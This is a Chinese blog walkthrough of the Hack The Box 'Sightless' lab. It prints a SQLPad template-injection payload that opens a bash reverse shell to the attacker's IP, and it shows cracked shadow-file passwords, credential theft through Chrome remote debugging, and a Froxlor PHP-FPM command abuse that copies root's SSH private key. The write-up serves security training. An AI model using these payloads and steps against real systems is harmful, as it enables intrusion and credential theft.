HTB靶场 sightless (Linux)[Easy]

admin 2024年9月22日04:28:50评论86 views字数 2083阅读6分56秒阅读模式

本文章仅用于网络安全研究学习,请勿使用相关技术进行违法犯罪活动。

Hack The Box是一个国外的靶机在线平台,实验环境将实时更新,允许您测试您的渗透测试技能。

知识点:已知漏洞利用、chrome远程调试

kali: 10.10.16.3

靶机:10.10.11.32

0001.利用sqlpad漏洞反弹shell

使用nmap扫描,开放端口为21、22、80

对21端口FTP进行匿名登录、遍历登录测试无果。

nmap -A 10.10.11.32

HTB靶场 sightless (Linux)[Easy]

使用dnsmasq设置域名和ip,访问主页http://sightless.htb    

HTB靶场 sightless (Linux)[Easy]

在主页简单的点点,就可以找到子域名http://sqlpad.sightless.htb

HTB靶场 sightless (Linux)[Easy]

网上搜索找到sqlpad可利用漏洞

https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

sqlpad漏洞

点击Connections - Add connection

Driver选择Mysql,在Database处写入payload即可执行系统命令。

这里有个坑,使用curl请求本地一直不成功,还以为漏洞利用失败,其实是目标环境为Dokcer,没有安装curl。

{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.16.3/4445 0>&1"') }}

HTB靶场 sightless (Linux)[Easy]

成功反弹shell

HTB靶场 sightless (Linux)[Easy]

002.获取michael权限

进来就是root权限,且在根目录发现.dockerenv文件,可以判断我们是在docker里面。

HTB靶场 sightless (Linux)[Easy]

先查看/home和/etc/passwd,michael用户是可以登录的。将/etc/shadow里面michael用户的密钥复制到本地。

HTB靶场 sightless (Linux)[Easy]

使用hashcat解密,获取michael用户名密码:

michael |  insaneclownposse
hashcat -m 1800 dockerma.hash rockyou.txthashcat -m 1800 dockerma.hash rockyou.txt --show

HTB靶场 sightless (Linux)[Easy]

使用ssh登录,成功获取michael权限:    

HTB靶场 sightless (Linux)[Easy]

003.获取root权限

首先查看端口开放情况,开放的端口很多。

netstat -tuln

HTB靶场 sightless (Linux)[Easy]

比较引入注意的是8080端口,将8080端口映射到本地。发现是froxlor系统,froxlor是一款web控制面板。

网上查询相关漏洞没有能绕过登录的,测试穷举登录,sql注入、默认用户名密码等都无法绕过。

ssh michael@10.10.11.32 -L 8080:localhost:8080    

HTB靶场 sightless (Linux)[Easy]

再查看进程,发现john用户启用了很多chrome程序,进一步查看命令,发现是chrome的调试模式。

ps -auxps -aux | grep chrome

HTB靶场 sightless (Linux)[Easy]

经过搜索,发现chrome可以进行远程调试,这一步需要将多个端口映射本地。

我这里映射了421411、36943、8080端口。根据情况不同,可以多映射几个。

ssh michael@10.10.11.32 -L 42141:localhost:42141

下面在kali中打开chrome,访问chrome://inspect/#devices,

Configure里面设置127.0.0.1:port    

HTB靶场 sightless (Linux)[Easy]

在该界面等一会,你会发现下面会不断访问http://admin.sightless.htb:8080

HTB靶场 sightless (Linux)[Easy]

点击inspect,会弹出DevTools(这一步要多试几次)

点击保留日志,让它访问几次,过一会我们就能找到Froxlor的用户名密码。    

这里是因为本地在进行调试或者测试,不断循环访问网站,而我们使用远程调试则可以看到访问网站的过程。

admin | ForlorfroxAdmin

HTB靶场 sightless (Linux)[Easy]

访问http://127.0.0.1:8080,使用刚才获取的用户名密码登录,成功进入后台。

HTB靶场 sightless (Linux)[Easy]

我们将root的私钥拷贝到tmp文件夹,进入PHP-FPM versions修改第一行的php-fpm restart command

可能有小伙伴会问,我们为什么不直接反弹shell?

因为命令行在保存时会校验,具体检验内容没有测试,但是仿造原命令的三段式可以通过校验。

cp /root/.ssh/id_rsa /tmp/id_rsa

HTB靶场 sightless (Linux)[Easy]

将PHP-FPM功能打开进入System下的Settings,将PHP-FPM里面Enable php-fpm打开。

HTB靶场 sightless (Linux)[Easy]

等会发现id_rsa文件被拷贝到tmp,但是我们没有读写权限,再用上面的方法。

修改PHP-FPM versions第一行的php-fpm restart command,过会发现有了读写权限。    

chmod 777 /tmp/id_rsa

HTB靶场 sightless (Linux)[Easy]

将该文件复制到本地,然后设置权限,使用ssh连接,成功获取root权限。

chmod 700 root_idrsassh -I root_idrsa root@10.10.11.32

HTB靶场 sightless (Linux)[Easy]    

感谢收看!

原文始发于微信公众号(Rsec):HTB靶场 sightless (Linux)[Easy]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月22日04:28:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB靶场 sightless (Linux)[Easy]http://cn-sec.com/archives/3168861.html

发表评论

匿名网友 填写信息